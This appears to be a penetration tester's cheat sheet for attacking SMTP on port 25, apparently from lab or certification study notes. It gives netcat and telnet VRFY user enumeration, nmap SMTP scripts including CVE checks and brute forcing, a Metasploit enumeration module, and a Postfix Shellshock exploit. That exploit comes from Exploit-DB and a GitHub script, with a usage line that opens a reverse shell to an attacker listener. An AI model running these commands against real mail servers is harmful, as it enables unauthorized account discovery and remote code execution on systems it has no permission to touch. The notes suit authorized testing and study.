SMTP (TCP port 25)
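#Banner grab; then, inside the session, VRFY a likely account and a made-up one and compare the replies (a server with VRFY disabled, e.g. Postfix with disable_vrfy_command = yes, answers both the same way)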
nc -nv 10.11.1.217 25
VRFY root
VRFY fuckoff
#Telnet
telnet 192.168.1.107 25
#Nmap: list the installed SMTP NSE scripts, then run the relevant ones against port 25
locate .nse | grep smtp
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.10.10.10
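or, to run every script matching smtp-* (this also pulls in smtp-brute and smtp-open-relay, so it is louder and can cause account lockouts):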
sudo nmap --script "smtp-*" 10.11.1.217
#Metasploit
use auxiliary/scanner/smtp/smtp_enum
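#Postfix Shellshock: copy the Exploit-DB script into the working directory. Shellshock is a bug in Bash rather than in Postfix itself, so the fix is on the Bash side (patch Bash on the mail host).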
sudo searchsploit -m linux/remote/34896.py
#If this one fails, there is an automated exploit on GitHub (unvetted third-party code; read it before running it):
https://github.com/3mrgnc3/pentest_old/blob/master/postfix-shellshock-nc.py
#It automates the process and spawns a shell for you (the commands below assume it was saved as smtpExploit.py):
sudo chmod +x smtpExploit.py
Usage: smtpExploit.py <target-ip> <valid-email> <lhost> <lport>
python2 smtpExploit.py 10.11.1.231 useradm@mail.local 192.168.119.177 1234